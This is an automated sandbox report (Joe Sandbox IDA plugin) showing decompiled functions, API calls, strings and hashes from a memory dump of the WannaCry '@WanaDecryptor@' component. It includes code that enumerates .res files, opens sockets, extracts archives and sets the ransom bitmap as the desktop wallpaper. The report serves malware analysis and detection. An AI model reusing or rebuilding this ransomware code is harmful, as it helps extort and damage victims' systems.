Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
API String ID: 2238633743-2459060434
Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb");
				_t47 = FindFirstFileA("*.res", _t74);
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74);
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t105 = fopen( &_v1476, "rb");
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105);
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105);
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}

0x004080c9
0x004080d7
0x004080d9
0x004080e3
0x004080f3
0x004080f7
0x004080f7
0x004080f9
0x004080fb
0x00408102
0x00408110
0x00408111
0x0040811a
0x0040811e
0x0040820a
0x0040821c
0x00408237
0x00408266
0x0040826c
0x00408276
0x0040827b
0x00408280
0x00408285
0x00408287
0x0040828f
0x004082b8
0x004082b8
0x00408291
0x0040829d
0x004082a2
0x00000000
0x00408124
0x0040812a
0x004081e4
0x004081e4
0x004081e8
0x004081f1
0x004081f7
0x004081f9
0x00408130
0x00408138
0x0040814a
0x00408152
0x0040816a
0x00408170
0x00408176
0x00408187
0x00408189
0x0040818e
0x004081a0
0x004081a2
0x004081a8
0x004081b9
0x004081b9
0x004081be
0x004081cb
0x004081d0
0x004081e2
0x004081e2
0x004081e2
0x004081d0
0x0040818e
0x00408176
0x00408152
0x00000000
0x004081ff
0x00408200
0x00408206
0x00000000
0x00408206
0x004081f9

APIs

FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
sscanf.MSVCRT ref: 0040816A
fopen.MSVCRT ref: 00408185
fread.MSVCRT ref: 004081A0
fclose.MSVCRT ref: 004081BE
FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
FindClose.KERNEL32(?), ref: 00408200
sprintf.MSVCRT ref: 00408266
#537.MFC42(?,?,00000000), ref: 00408280
#537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2

Strings

*.res, xrefs: 0040810B
%08X.res, xrefs: 00408164
---%s%s%d%I64d%d, xrefs: 00408260

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
String ID: %08X.res$*.res$---%s%s%d%I64d%d
API String ID: 1530363904-2310201135
Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 0040D6C7
socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
bind.WS2_32(00000000,?,00000010), ref: 0040D709
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
connect.WS2_32(00000000,?,00000010), ref: 0040D73A
select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
__WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
__WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
setsockopt.WS2_32(00000000), ref: 0040D7DD
setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
closesocket.WS2_32(00000000), ref: 0040D80E

Strings

`, xrefs: 0040D7D5

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
String ID: `
API String ID: 478405425-1850852036
Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150);
										L00412CEC();
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
																__eflags = 1;
																if(1 != 0) {
																	_t307 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t204 = E00411B50(_t307, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x10c) = _t204;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
																}
																__eflags = _t276;
																if(_t276 != 0) {
																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
																}
															} else {
																goto L60;
															}
															goto L69;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L59;
														L60:
														_t341 = _t341 + 4;
														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
												}
												L69:
												__eflags = _t329;
												if(_t329 != 0) {
													_push(_t329);
													L00412C98();
													_t356 = _t356 + 4;
												}
												_t182 =  *((intOrPtr*)(_t356 + 0x20));
												memcpy(_t182 + 8, _t346, 0x4b << 2);
												 *((intOrPtr*)(_t182 + 0x134)) =  *((intOrPtr*)(_t356 + 0x2a0));
												__eflags = 0;
												return 0;
												goto L73;
											}
										} else {
											_push(_t313);
											L00412C98();
											return 0x800;
										}
									} else {
										return 0x800;
									}
								} else {
									return 0x700;
								}
							} else {
								goto L8;
							}
						} else {
							if(_t312 == _t232) {
								L8:
								_t226 =  *((intOrPtr*)(_t348 + 0x28c));
								 *_t226 =  *((intOrPtr*)( *_t336 + 4));
								 *((char*)(_t226 + 4)) = 0;
								 *((intOrPtr*)(_t226 + 0x108)) = 0;
								 *((intOrPtr*)(_t226 + 0x10c)) = 0;
								 *((intOrPtr*)(_t226 + 0x110)) = 0;
								 *((intOrPtr*)(_t226 + 0x114)) = 0;
								 *((intOrPtr*)(_t226 + 0x118)) = 0;
								 *((intOrPtr*)(_t226 + 0x11c)) = 0;
								 *((intOrPtr*)(_t226 + 0x120)) = 0;
								 *((intOrPtr*)(_t226 + 0x124)) = 0;
								 *((intOrPtr*)(_t226 + 0x128)) = 0;
								__eflags = 0;
								return 0;
							} else {
								return memcpy( *(_t348 + 0x298), _t336 + 8, 0x4b << 2);
							}
						}
					}
				}
				L73:
			}

Strings

\../, xrefs: 00411F15
/..\, xrefs: 00411F43
\..\, xrefs: 00411EFE
/../, xrefs: 00411F2C

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID: /../$/..\$\../$\..\
API String ID: 0-3885502717
Opcode ID: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
Instruction ID: 7e1d0207c54717434a39a3e8c1400c014a600b9e0d7efc558eb6bad2cf7342ef
Opcode Fuzzy Hash: 609ee301a0957fc1d178a82fd6ad0030074ae851484ad2f13760bdfbe56840fa
Instruction Fuzzy Hash: FAF138756043414FC724CF2888817EBBBE1ABD8304F18892EEDD9CB351D679E989C799

Uniqueness

Uniqueness Score: -1.00%

Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0);
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
wcslen.MSVCRT ref: 00407EF4
swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67

Strings

%s\%s, xrefs: 00407F1A
@WanaDecryptor@.bmp, xrefs: 00407F10
b.wnry, xrefs: 00407F38

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
API String ID: 13424474-2236924158
Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B

Uniqueness

Uniqueness Score: -1.00%

Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}

APIs

IsIconic.USER32(?), ref: 004067FA
#470.MFC42 ref: 0040680F
SendMessageA.USER32(?,00000027,?,00000000), ref: 0040682B
GetSystemMetrics.USER32(0000000B), ref: 00406839
GetSystemMetrics.USER32(0000000C), ref: 0040683F
GetClientRect.USER32(?,?), ref: 0040684C
DrawIcon.USER32(?,?,?,?), ref: 00406884
#755.MFC42 ref: 0040688E
#2379.MFC42 ref: 0040689C

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

